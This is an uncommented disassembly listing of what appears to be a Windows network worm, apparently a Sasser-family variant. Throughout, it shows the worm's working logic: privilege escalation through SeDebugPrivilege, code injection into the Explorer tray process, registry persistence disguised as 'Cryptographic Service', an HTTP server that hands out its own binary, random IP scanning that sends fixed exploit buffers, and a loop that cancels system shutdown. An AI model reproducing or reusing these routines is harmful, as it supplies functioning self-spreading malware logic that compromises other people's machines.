push edi
call esi ; dword_31421094
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_3142116C ; recv
cmp eax, 0FFFFFFFFh
jz loc_31421D4C
push 0
push 0A8h
push offset dword_3142460C
push [ebp+var_4]
call ebx ; dword_31421168
push edi
call esi ; dword_31421094
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_3142116C ; recv
cmp eax, 0FFFFFFFFh
jz loc_31421D4C
push 0
push 0DEh
push offset dword_314246B8
push [ebp+var_4]
call ebx ; dword_31421168
push edi
call esi ; dword_31421094
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_3142116C ; recv
cmp eax, 0FFFFFFFFh
jz loc_31421D4C
cmp eax, 46h
jl loc_31421D4C
cmp [ebp+var_730], 31h
jnz loc_31421BF7
and [ebp+arg_0], 0
push 7D0h
lea eax, [ebp+var_F44]
push 90h
push eax
call sub_31422CD6 ; memset
add esp, 0Ch
push offset byte_314242B8
call dword_31421084 ; lstrlenA
push eax
lea eax, [ebp+var_EA4]
push offset byte_314242B8
push eax
call sub_31422CE2 ; memcpy
add esp, 0Ch
lea eax, [ebp+var_14]
push eax
call dword_31421084 ; lstrlenA
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_788]
push eax
call sub_31422CE2 ; memcpy
mov eax, dword_31424BBE
add esp, 0Ch
mov [ebp+var_798], eax
loc_31421A98: ; CODE XREF: sub_31421801+4E1�j
movsx eax, [ebp+var_5]
add eax, 4
push 0
push eax
lea eax, [ebp+var_E4]
push eax
push [ebp+var_4]
call ebx ; dword_31421168
push edi
call esi ; dword_31421094
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_3142116C ; recv
cmp eax, 0FFFFFFFFh
jz loc_31421D4C
push 0
push 68h
push offset dword_314247FC
push [ebp+var_4]
call ebx ; dword_31421168
push edi
call esi ; dword_31421094
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_3142116C ; recv
cmp eax, 0FFFFFFFFh
jz loc_31421D4C
push 0
push 0A0h
push offset dword_31424868
push [ebp+var_4]
call ebx ; dword_31421168
push edi
call esi ; dword_31421094
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_3142116C ; recv
cmp eax, 0FFFFFFFFh
jz loc_31421D4C
cmp [ebp+arg_0], 0
jz loc_31421CE7
push 68h
lea eax, [ebp+var_89E4]
push offset dword_31424A20
push eax
call sub_31422CE2 ; memcpy
lea eax, [ebp+var_4834]
push 1B5Ah
push eax
lea eax, [ebp+var_897C]
push eax
call sub_31422CE2 ; memcpy
push 70h
lea eax, [ebp+var_690C]
push offset dword_31424A8C
push eax
call sub_31422CE2 ; memcpy
lea eax, [ebp+var_37A0]
push 0A5Eh
push eax
lea eax, [ebp+var_689C]
push eax
call sub_31422CE2 ; memcpy
push 84h
lea eax, [ebp+var_5DD8]
push offset dword_31424B00
push eax
call sub_31422CE2 ; memcpy
add esp, 3Ch
lea eax, [ebp+var_89E4]
push 0
push 10FCh
push eax
push [ebp+var_4]
call ebx ; dword_31421168
push edi
call esi ; dword_31421094
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_3142116C ; recv
cmp eax, 0FFFFFFFFh
jz loc_31421D4C
push 0
push 0FDCh
lea eax, [ebp+var_690C]
jmp loc_31421D3F
; ---------------------------------------------------------------------------
loc_31421BF7: ; CODE XREF: sub_31421801+22B�j
push 0DACh
lea eax, [ebp+var_2CD8]
push 90h
push eax
mov [ebp+arg_0], 1
call sub_31422CD6 ; memset
push 4
lea eax, [ebp+var_24F4]
push offset dword_31424BF8
push eax
call sub_31422CE2 ; memcpy
push offset byte_314242B8
call sub_31422CDC ; strlen
push eax
lea eax, [ebp+var_24E4]
push offset byte_314242B8
push eax
call sub_31422CE2 ; memcpy
push 4
lea eax, [ebp+var_21C0]
push offset loc_31424C70
push eax
call sub_31422CE2 ; memcpy
push 4
lea eax, [ebp+var_21BC]
push offset dword_31424BF8
push eax
call sub_31422CE2 ; memcpy
add esp, 40h
push offset byte_314242B8
call sub_31422CDC ; strlen
push eax
lea eax, [ebp+var_21B0]
push offset byte_314242B8
push eax
call sub_31422CE2 ; memcpy
add esp, 10h
xor ecx, ecx
lea eax, [ebp+var_4833]
loc_31421C93: ; CODE XREF: sub_31421801+4A8�j
mov dl, [ebp+ecx+var_2CD8]
mov [eax-1], dl
and byte ptr [eax], 0
inc ecx
inc eax
inc eax
cmp ecx, 0DACh
jl short loc_31421C93
and [ebp+var_2CDC], 0
and [ebp+var_2CDB], 0
push 1C52h
lea eax, [ebp+var_89E4]
push 31h
push eax
call sub_31422CD6 ; memset
push 1C52h
lea eax, [ebp+var_690C]
push 31h
push eax
call sub_31422CD6 ; memset
add esp, 18h
jmp loc_31421A98
; ---------------------------------------------------------------------------
loc_31421CE7: ; CODE XREF: sub_31421801+339�j
push 7Ch
lea eax, [ebp+var_1F28]
push offset dword_3142490C
push eax
call sub_31422CE2 ; memcpy
lea eax, [ebp+var_F44]
push 7D0h
push eax
lea eax, [ebp+var_1EAC]
push eax
call sub_31422CE2 ; memcpy
push 90h
lea eax, [ebp+var_16DC]
push offset dword_3142498C
push eax
call sub_31422CE2 ; memcpy
add esp, 24h
and [ebp+var_1231], 0
lea eax, [ebp+var_1F28]
push 0
push 0CF8h
loc_31421D3F: ; CODE XREF: sub_31421801+3F1�j
push eax
push [ebp+var_4]
call ebx ; dword_31421168
push edi
call esi ; dword_31421094
and [ebp+var_C], 0
loc_31421D4C: ; CODE XREF: sub_31421801+1AD�j
; sub_31421801+1E1�j ...
push 2
push [ebp+var_4]
call dword_31421170 ; shutdown
loc_31421D57: ; CODE XREF: sub_31421801+166�j
push [ebp+var_4]
call dword_31421174 ; closesocket
pop esi
loc_31421D61: ; CODE XREF: sub_31421801+37�j
mov eax, [ebp+var_C]
pop edi
pop ebx
leave
retn
sub_31421801 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31421D68 proc near ; CODE XREF: UPX0:loc_31422376�p
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 1Ch
push esi
push edi
push offset aAdvapi32 ; "advapi32"
call dword_314210A8 ; LoadLibraryA
mov esi, dword_314210A4
mov edi, eax
push offset aOpenprocesstok ; "OpenProcessToken"
push edi
call esi ; dword_314210A4
test eax, eax
mov [ebp+var_4], eax
jz short loc_31421DEC
push offset aLookupprivileg ; "LookupPrivilegeValueA"
push edi
call esi ; dword_314210A4
test eax, eax
mov [ebp+var_8], eax
jz short loc_31421DEC
push offset aAdjusttokenpri ; "AdjustTokenPrivileges"
push edi
call esi ; dword_314210A4
mov esi, eax
test esi, esi
jz short loc_31421DEC
lea eax, [ebp+var_C]
push eax
push 20h
call dword_314210A0 ; GetCurrentProcess
push eax
call [ebp+var_4]
lea eax, [ebp+var_18]
mov [ebp+var_1C], 1
push eax
push offset aSedebugprivile ; "SeDebugPrivilege"
push 0
mov [ebp+var_10], 2
call [ebp+var_8]
push 0
push 0
lea eax, [ebp+var_1C]
push 10h
push eax
push 0
push [ebp+var_C]
call esi ; GetProcAddress
loc_31421DEC: ; CODE XREF: sub_31421D68+28�j
; sub_31421D68+37�j ...
pop edi
pop esi
leave
retn
sub_31421D68 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31421DF0 proc near ; CODE XREF: UPX0:3142238A�p
var_18 = byte ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 18h
mov ecx, dword_31425000
and [ebp+var_4], 0
push ebx
push esi
mov eax, [ecx+3Ch]
push edi
add eax, ecx
push offset aKernel32 ; "kernel32"
mov ecx, [eax+34h]
mov edi, [eax+50h]
mov [ebp+var_C], ecx
call dword_314210B4 ; GetModuleHandleA
mov esi, dword_314210A4
mov ebx, eax
push offset aVirtualallocex ; "VirtualAllocEx"
push ebx
call esi ; dword_314210A4
test eax, eax
mov [ebp+var_10], eax
jnz short loc_31421E37
loc_31421E33: ; CODE XREF: sub_31421DF0+54�j
push 1
jmp short loc_31421E88
; ---------------------------------------------------------------------------
loc_31421E37: ; CODE XREF: sub_31421DF0+41�j
push offset aCreateremoteth ; "CreateRemoteThread"
push ebx
call esi ; dword_314210A4
test eax, eax
mov [ebp+var_14], eax
jz short loc_31421E33
push 0
push offset aShell_traywnd ; "Shell_TrayWnd"
call dword_31421110 ; FindWindowA
test eax, eax
jnz short loc_31421E65
call dword_31421114 ; GetForegroundWindow
test eax, eax
jnz short loc_31421E65
push 2
jmp short loc_31421E88
; ---------------------------------------------------------------------------
loc_31421E65: ; CODE XREF: sub_31421DF0+65�j
; sub_31421DF0+6F�j
lea ecx, [ebp+var_8]
push ecx
push eax
call dword_31421118 ; GetWindowThreadProcessId
push [ebp+var_8]
push 0
push 42Ah
call dword_314210B0 ; OpenProcess
mov ebx, eax
test ebx, ebx
jnz short loc_31421E8B
push 3
loc_31421E88: ; CODE XREF: sub_31421DF0+45�j
; sub_31421DF0+73�j
pop eax
jmp short loc_31421EF6
; ---------------------------------------------------------------------------
loc_31421E8B: ; CODE XREF: sub_31421DF0+94�j
push 4
push 3000h
push edi
push [ebp+var_C]
push ebx
call [ebp+var_10]
mov esi, dword_3142107C
test eax, eax
jz short loc_31421EE9
lea ecx, [ebp+var_10]
push ecx
push edi
push eax
push eax
push ebx
call dword_314210AC ; WriteProcessMemory
push dword_31424FF4
call esi ; dword_3142107C
lea eax, [ebp+var_18]
xor edi, edi
push eax
push edi
push 1
push [ebp+arg_0]
push edi
push edi
push ebx
call [ebp+var_14]
cmp eax, edi
jz short loc_31421ED5
push eax
call esi ; dword_3142107C
jmp short loc_31421EF0
; ---------------------------------------------------------------------------
loc_31421ED5: ; CODE XREF: sub_31421DF0+DE�j
push offset aUterm19_2 ; "uterm19.2"
call sub_31421F29
pop ecx
mov [ebp+var_4], 5
jmp short loc_31421EF0
; ---------------------------------------------------------------------------
loc_31421EE9: ; CODE XREF: sub_31421DF0+B2�j
mov [ebp+var_4], 4
loc_31421EF0: ; CODE XREF: sub_31421DF0+E3�j
; sub_31421DF0+F7�j
push ebx
call esi ; dword_3142107C
mov eax, [ebp+var_4]
loc_31421EF6: ; CODE XREF: sub_31421DF0+99�j
pop edi
pop esi
pop ebx
leave
retn
sub_31421DF0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31421EFB proc near ; CODE XREF: sub_314221C4+B�p
; UPX0:3142234C�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
push edi
pusha
rdtsc
mov [ebp+var_8], eax
popa
mov [ebp+var_4], esp
call dword_314210B8 ; GetTickCount
mov ecx, [ebp+var_4]
imul ecx, [ebp+var_8]
add eax, ecx
push eax
call dword_314210EC ; srand
pop ecx
pop edi
pop esi
pop ebx
leave
retn
sub_31421EFB endp
; =============== S U B R O U T I N E =======================================
sub_31421F29 proc near ; CODE XREF: sub_31421DF0+EA�p
; UPX0:31422356�p ...
arg_0 = dword ptr 4
push [esp+arg_0]
push 1
push 0
call dword_314210BC ; CreateMutexA
retn
sub_31421F29 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31421F38 proc near ; CODE XREF: sub_314223B2+155�p
; sub_314223B2+160�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
lea eax, [ebp+arg_4]
push eax
xor eax, eax
push eax
push [ebp+arg_4]
push [ebp+arg_0]
push eax
push eax
call dword_314210C0 ; CreateThread
pop ebp
retn
sub_31421F38 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31421F52 proc near ; CODE XREF: sub_314221C4+12C�p
; sub_314225C3+5A�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
lea eax, [ebp+arg_4]
push eax
xor eax, eax
push eax
push [ebp+arg_4]
push [ebp+arg_0]
push eax
push eax
call dword_314210C0 ; CreateThread
push eax
call dword_3142107C ; CloseHandle
pop ebp
retn
sub_31421F52 endp
; =============== S U B R O U T I N E =======================================
sub_31421F73 proc near ; CODE XREF: sub_314211A0+68�p
; sub_31422A9B+3B�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
mov ebx, [esp+4+arg_0]
push esi
push edi
mov edi, [esp+0Ch+arg_4]
xor esi, esi
test edi, edi
jle short loc_31421F9B
loc_31421F84: ; CODE XREF: sub_31421F73+26�j
call dword_314210FC ; rand
push 1Ah
cdq
pop ecx
idiv ecx
add dl, 61h
mov [esi+ebx], dl
inc esi
cmp esi, edi
jl short loc_31421F84
loc_31421F9B: ; CODE XREF: sub_31421F73+F�j
and byte ptr [ebx+edi], 0
pop edi
pop esi
pop ebx
retn
sub_31421F73 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31421FA3 proc near ; CODE XREF: sub_314211A0+105�p
var_54 = dword ptr -54h
var_24 = word ptr -24h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = word ptr 0Ch
push ebp
mov ebp, esp
sub esp, 54h
push esi
push edi
push 44h
xor esi, esi
pop edi
lea eax, [ebp+var_54]
push edi
push esi
push eax
call sub_31422CD6 ; memset
mov ax, [ebp+arg_4]
add esp, 0Ch
mov [ebp+var_24], ax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_54]
push eax
push esi
push esi
push esi
push esi
push esi
push esi
mov [ebp+var_54], edi
push [ebp+arg_0]
push esi
call dword_314210C4 ; CreateProcessA
push [ebp+var_C]
mov esi, dword_3142107C
mov edi, eax
call esi ; dword_3142107C
push [ebp+var_10]
call esi ; dword_3142107C
mov eax, edi
pop edi
pop esi
leave
retn
sub_31421FA3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31421FF9 proc near ; CODE XREF: sub_3142264B+3E�p
; sub_31422712+7�p ...
var_34 = byte ptr -34h
push ebp
mov ebp, esp
sub esp, 34h
lea eax, [ebp+var_34]
push 31h
push eax
call dword_3142114C ; gethostname
cmp eax, 0FFFFFFFFh
jnz short loc_3142201A
call dword_31421150 ; WSAGetLastError
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_3142201A: ; CODE XREF: sub_31421FF9+15�j
lea eax, [ebp+var_34]
push eax
call dword_31421154 ; gethostbyname
test eax, eax
jnz short loc_3142202F
mov eax, 100007Fh
leave
retn
; ---------------------------------------------------------------------------
loc_3142202F: ; CODE XREF: sub_31421FF9+2D�j
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
leave
retn
sub_31421FF9 endp
; =============== S U B R O U T I N E =======================================
sub_31422038 proc near ; CODE XREF: sub_314216A2+12�p
; sub_3142255F+22�p ...
var_4 = byte ptr -4
push ecx
lea eax, [esp+4+var_4]
push 0
push eax
call dword_31421130 ; InternetGetConnectedState
neg eax
sbb eax, eax
neg eax
pop ecx
retn
sub_31422038 endp
; =============== S U B R O U T I N E =======================================
sub_3142204E proc near ; CODE XREF: sub_314223B2+E6�p
arg_0 = dword ptr 4
push [esp+arg_0]
push 0
push 2
call dword_314210CC ; OpenEventA
test eax, eax
jz short locret_31422067
push eax
call dword_314210C8 ; SetEvent
locret_31422067: ; CODE XREF: sub_3142204E+10�j
retn
sub_3142204E endp
; =============== S U B R O U T I N E =======================================
sub_31422068 proc near ; CODE XREF: sub_314216A2+68�p
push esi
mov esi, dword_314210FC
push edi
call esi ; dword_314210FC
mov edi, eax
shl edi, 10h
call esi ; dword_314210FC
or eax, edi
pop edi
pop esi
retn
sub_31422068 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3142207E proc near ; DATA XREF: sub_314221C4+127�o
var_200 = byte ptr -200h
var_100 = byte ptr -100h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 200h
push ebx
mov ebx, [ebp+arg_0]
push esi
push edi
xor edi, edi
lea eax, [ebp+var_100]
push edi
push 100h
push eax
push ebx
call dword_3142116C ; recv
cmp eax, 0FFFFFFFFh
jnz short loc_314220AF
push 1
jmp loc_3142216A
; ---------------------------------------------------------------------------
loc_314220AF: ; CODE XREF: sub_3142207E+28�j
mov esi, dword_31421104
lea eax, [ebp+var_100]
push offset aGet ; "GET"
push eax
call esi ; dword_31421104
pop ecx
test eax, eax
pop ecx
jz loc_3142217A
lea eax, [ebp+var_100]
push offset dword_314241F0
push eax
call esi ; dword_31421104
pop ecx
test eax, eax
pop ecx
jz loc_3142217A
mov esi, dword_31421168
push 0
push 3Dh
push offset aHttp1_1200OkCo ; "HTTP/1.1 200 OK\r\nContent-Type: applicat"...
push ebx
call esi ; dword_31421168
push dword_31424FF0
lea eax, [ebp+var_200]
push offset aContentLengthU ; "Content-Length: %u\r\n\r\n"
push eax
call dword_3142111C ; wsprintfA
add esp, 0Ch
lea eax, [ebp+var_200]
push 0
push eax
call sub_31422CDC ; strlen
pop ecx
push eax
lea eax, [ebp+var_200]
push eax
push ebx
call esi ; dword_31421168
loc_3142212C: ; CODE XREF: sub_3142207E+E8�j
mov eax, dword_31424FF0
mov ecx, 1000h
sub eax, edi
cmp eax, ecx
jb short loc_3142213E
mov eax, ecx
loc_3142213E: ; CODE XREF: sub_3142207E+BC�j
test eax, eax
jz short loc_3142216D
push 0
push eax
mov eax, dword_31424FE8
add eax, edi
push eax
push ebx
call esi ; dword_31421168
cmp eax, 0FFFFFFFFh
jz short loc_31422168
cmp eax, 1000h
jb short loc_3142216D
push 64h
add edi, eax
call dword_31421094 ; Sleep
jmp short loc_3142212C
; ---------------------------------------------------------------------------
loc_31422168: ; CODE XREF: sub_3142207E+D5�j
push 2
loc_3142216A: ; CODE XREF: sub_3142207E+2C�j
pop eax
jmp short loc_314221BD
; ---------------------------------------------------------------------------
loc_3142216D: ; CODE XREF: sub_3142207E+C2�j
; sub_3142207E+DC�j
push offset dword_31424FEC
call dword_314210D4 ; InterlockedIncrement
jmp short loc_31422198
; ---------------------------------------------------------------------------
loc_3142217A: ; CODE XREF: sub_3142207E+49�j
; sub_3142207E+61�j
mov esi, dword_31421168
push 0
push 15h
push offset aHttp1_1200Ok ; "HTTP/1.1 200 OK\r\n\r\n\r\n"
push ebx
call esi ; dword_31421168
push 0
push 3
push offset dword_31424D3C
push ebx
call esi ; dword_31421168
loc_31422198: ; CODE XREF: sub_3142207E+FA�j
push 7D0h
call dword_31421094 ; Sleep
push 2
push ebx
call dword_31421170 ; shutdown
push ebx
call dword_31421174 ; closesocket
push 0
call dword_314210D0 ; ExitThread
xor eax, eax
loc_314221BD: ; CODE XREF: sub_3142207E+ED�j
pop edi
pop esi
pop ebx
leave
retn 4
sub_3142207E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_314221C4 proc near ; DATA XREF: sub_314223B2+150�o
var_130 = byte ptr -130h
var_28 = byte ptr -28h
var_18 = word ptr -18h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 130h
push ebx
push edi
call sub_31421EFB
lea eax, [ebp+var_130]
push 104h
push eax
push offset aCryptographicS ; "Cryptographic Service"
xor ebx, ebx
push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push 80000002h
mov dword_31424FEC, ebx
call sub_31422882
add esp, 14h
test eax, eax
jnz loc_314222F9
push esi
push ebx
push ebx
push 3
push ebx
push 1
lea eax, [ebp+var_130]
push 80000000h
push eax
call dword_31421080 ; CreateFileA
mov esi, eax
cmp esi, 0FFFFFFFFh
jnz short loc_31422230
push 1
call dword_314210D0 ; ExitThread
loc_31422230: ; CODE XREF: sub_314221C4+62�j
push ebx
push esi
call dword_314210DC ; GetFileSize
push eax
mov dword_31424FF0, eax
call sub_31422CA5
pop ecx
mov dword_31424FE8, eax
lea ecx, [ebp+var_4]
push ebx
push ecx
push dword_31424FF0
push eax
push esi
call dword_314210D8 ; ReadFile
mov eax, [ebp+var_4]
push esi
mov dword_31424FF0, eax
call dword_3142107C ; CloseHandle
push ebx
push 1
push 2
call dword_31421158 ; socket
push 10h
mov edi, eax
pop esi
lea eax, [ebp+var_18]
push esi
push ebx
push eax
call sub_31422CD6 ; memset
add esp, 0Ch
mov [ebp+var_18], 2
mov [ebp+var_14], ebx
loc_31422292: ; CODE XREF: sub_314221C4+E5�j
; sub_314221C4+ED�j ...
call dword_314210FC ; rand
add eax, 7D0h
and eax, 1FFFh
cmp al, bl
mov dword_31424FFC, eax
jz short loc_31422292
xor ecx, ecx
mov cl, ah
test cl, cl
jz short loc_31422292
push eax
call dword_31421160 ; ntohs
mov [ebp+var_16], ax
lea eax, [ebp+var_18]
push esi
push eax
push edi
call dword_31421140 ; bind
test eax, eax
jnz short loc_31422292
push 64h
push edi
call dword_31421144 ; listen
mov [ebp+var_8], esi
pop esi
loc_314222DB: ; CODE XREF: sub_314221C4+133�j
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_28]
push eax
push edi
call dword_31421148 ; accept
push eax
push offset sub_3142207E
call sub_31421F52
pop ecx
pop ecx
jmp short loc_314222DB
; ---------------------------------------------------------------------------
loc_314222F9: ; CODE XREF: sub_314221C4+3D�j
push ebx
call dword_314210D0 ; ExitThread
pop edi
xor eax, eax
pop ebx
leave
retn 4
sub_314221C4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31422308 proc near ; CODE XREF: sub_314223B2:loc_314224FC�p
var_190 = byte ptr -190h
push ebp
mov ebp, esp
sub esp, 190h
lea eax, [ebp+var_190]
push esi
mov esi, dword_3142113C
push eax
push 2
call esi ; dword_3142113C
lea eax, [ebp+var_190]
push eax
push 102h
call esi ; dword_3142113C
pop esi
leave
retn
sub_31422308 endp
; ---------------------------------------------------------------------------
loc_31422334: ; CODE XREF: UPX1:31427D08�j
push 0
call dword_314210B4 ; GetModuleHandleA
push offset aFtpupd_exe ; "ftpupd.exe"
mov dword_31425000, eax
call dword_31421074 ; DeleteFileA
call sub_31421EFB
push offset aUterm19_2 ; "uterm19.2"
call sub_31421F29
pop ecx
mov dword_31424FF4, eax
call dword_314210E4 ; RtlGetLastWin32Error
cmp eax, 0B7h
jnz short loc_31422376
push 1
call dword_314210E0 ; ExitProcess
loc_31422376: ; CODE XREF: UPX0:3142236C�j
call sub_31421D68
call sub_314229E6
call sub_31422B67
push offset sub_314223B2
call sub_31421DF0
test eax, eax
pop ecx
jz short loc_3142239B
push 0
call sub_314223B2
loc_3142239B: ; CODE XREF: UPX0:31422392�j
xor eax, eax
retn
; =============== S U B R O U T I N E =======================================
sub_3142239E proc near ; CODE XREF: sub_314223B2:loc_31422525�p
; sub_3142255F:loc_31422578�p ...
push 0
push dword_31424FF8
call dword_31421070 ; WaitForSingleObject
neg eax
sbb eax, eax
inc eax
retn
sub_3142239E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_314223B2 proc near ; CODE XREF: UPX0:31422396�p
; DATA XREF: UPX0:31422385�o
var_74 = dword ptr -74h
var_70 = dword ptr -70h
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_31421190
push offset loc_31422CD0
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 64h
push ebx
push esi
push edi
mov [ebp+var_70], offset aU10x ; "u10x"
mov [ebp+var_6C], offset aU11x ; "u11x"
mov [ebp+var_68], offset aU12x ; "u12x"
mov [ebp+var_64], offset aU13x ; "u13x"
mov [ebp+var_60], offset aU14x ; "u14x"
mov [ebp+var_5C], offset aU15x ; "u15x"
mov [ebp+var_58], offset aU16x ; "u16x"
mov [ebp+var_54], offset aU17x ; "u17x"
mov [ebp+var_50], offset aU18x ; "u18x"
mov [ebp+var_4C], offset aU8 ; "u8"
mov [ebp+var_48], offset aU9 ; "u9"
mov [ebp+var_44], offset aU10 ; "u10"
mov [ebp+var_40], offset aU11 ; "u11"
mov [ebp+var_3C], offset aU12 ; "u12"
mov [ebp+var_38], offset aU13 ; "u13"
mov [ebp+var_34], offset aU13i ; "u13i"
mov [ebp+var_30], offset aU14 ; "u14"
mov [ebp+var_2C], offset aU15 ; "u15"
mov [ebp+var_28], offset aU16 ; "u16"
mov [ebp+var_24], offset aU17 ; "u17"
mov [ebp+var_20], offset aU18 ; "u18"
mov [ebp+var_1C], offset aU19 ; "u19"
push offset aU19_2x ; "u19.2x"
xor edi, edi
push edi
push 1
push edi
call dword_3142106C ; CreateEventA
mov dword_31424FF8, eax
mov [ebp+var_4], edi
mov [ebp+var_74], edi
loc_3142248B: ; CODE XREF: sub_314223B2+EF�j
cmp [ebp+var_74], 9
jnb short loc_314224A3
mov eax, [ebp+var_74]
push [ebp+eax*4+var_70]
call sub_3142204E
pop ecx
inc [ebp+var_74]
jmp short loc_3142248B
; ---------------------------------------------------------------------------
loc_314224A3: ; CODE XREF: sub_314223B2+DD�j
mov [ebp+var_74], edi
loc_314224A6: ; CODE XREF: sub_314223B2+10A�j
cmp [ebp+var_74], 0Dh
jnb short loc_314224BE
mov eax, [ebp+var_74]
push [ebp+eax*4+var_4C]
call sub_31421F29
pop ecx
inc [ebp+var_74]
jmp short loc_314224A6
; ---------------------------------------------------------------------------
loc_314224BE: ; CODE XREF: sub_314223B2+F8�j
cmp [ebp+arg_0], edi
jz short loc_314224FC
push offset aWs2_32 ; "ws2_32"
mov esi, dword_314210A8
call esi ; dword_314210A8
push offset aWininet ; "wininet"
call esi ; dword_314210A8
push offset aMsvcrt ; "msvcrt"
call esi ; dword_314210A8
push offset aAdvapi32 ; "advapi32"
call esi ; dword_314210A8
push offset aUser32 ; "user32"
call esi ; dword_314210A8
push offset aUterm19_2 ; "uterm19.2"
call sub_31421F29
pop ecx
mov dword_31424FF4, eax
loc_314224FC: ; CODE XREF: sub_314223B2+10F�j
call sub_31422308
push edi
push offset sub_314221C4
call sub_31421F38
push edi
push offset sub_314216A2
call sub_31421F38
push edi
push offset loc_3142276E
call sub_31421F38
add esp, 18h
loc_31422525: ; CODE XREF: sub_314223B2+18E�j
call sub_3142239E
test eax, eax
jnz short loc_31422542
push edi
call dword_31421018 ; AbortSystemShutdownA
push 1388h
call dword_31421094 ; Sleep
jmp short loc_31422525
; ---------------------------------------------------------------------------
loc_31422542: ; CODE XREF: sub_314223B2+17A�j
or [ebp+var_4], 0FFFFFFFFh
call nullsub_2
xor eax, eax
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 4
sub_314223B2 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_2. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3142255F proc near ; DATA XREF: sub_314225C3+55�o
; sub_3142264B+6A�o ...
var_1 = byte ptr -1
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
cmp byte ptr [ebp+arg_0], 7Fh
jnz short loc_3142256E
push 1
pop eax
jmp short locret_314225BF
; ---------------------------------------------------------------------------
loc_3142256E: ; CODE XREF: sub_3142255F+8�j
mov al, byte ptr [ebp+arg_0+3]
push ebx
push esi
mov [ebp+var_1], al
xor bl, bl
loc_31422578: ; CODE XREF: sub_3142255F+5A�j
call sub_3142239E
test eax, eax
jnz short loc_314225BB
call sub_31422038
test eax, eax
jz short loc_314225BB
cmp [ebp+var_1], bl
jz short loc_314225B4
mov byte ptr [ebp+arg_0+3], bl
push [ebp+arg_0]
call sub_31421801
movzx esi, word_3142500C
pop ecx
call dword_314210FC ; rand
cdq
idiv esi
add edx, esi
push edx
call dword_31421094 ; Sleep
loc_314225B4: ; CODE XREF: sub_3142255F+2E�j
inc bl
cmp bl, 0FFh
jb short loc_31422578
loc_314225BB: ; CODE XREF: sub_3142255F+20�j
; sub_3142255F+29�j
pop esi
xor eax, eax
pop ebx
locret_314225BF: ; CODE XREF: sub_3142255F+D�j
leave
retn 4
sub_3142255F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_314225C3 proc near ; DATA XREF: sub_3142264B+7E�o
; UPX0:31422803�o
arg_0 = dword ptr 8
push ebp
mov ebp, esp
cmp byte ptr [ebp+arg_0], 7Fh
jnz short loc_314225D1
push 1
pop eax
jmp short loc_31422647
; ---------------------------------------------------------------------------
loc_314225D1: ; CODE XREF: sub_314225C3+7�j
push ebx
push esi
push edi
call sub_31421EFB
mov esi, dword_314210FC
xor ebx, ebx
loc_314225E1: ; CODE XREF: sub_314225C3+7D�j
call sub_3142239E
test eax, eax
jnz short loc_31422642
call sub_31422038
test eax, eax
jz short loc_31422642
call esi ; dword_314210FC
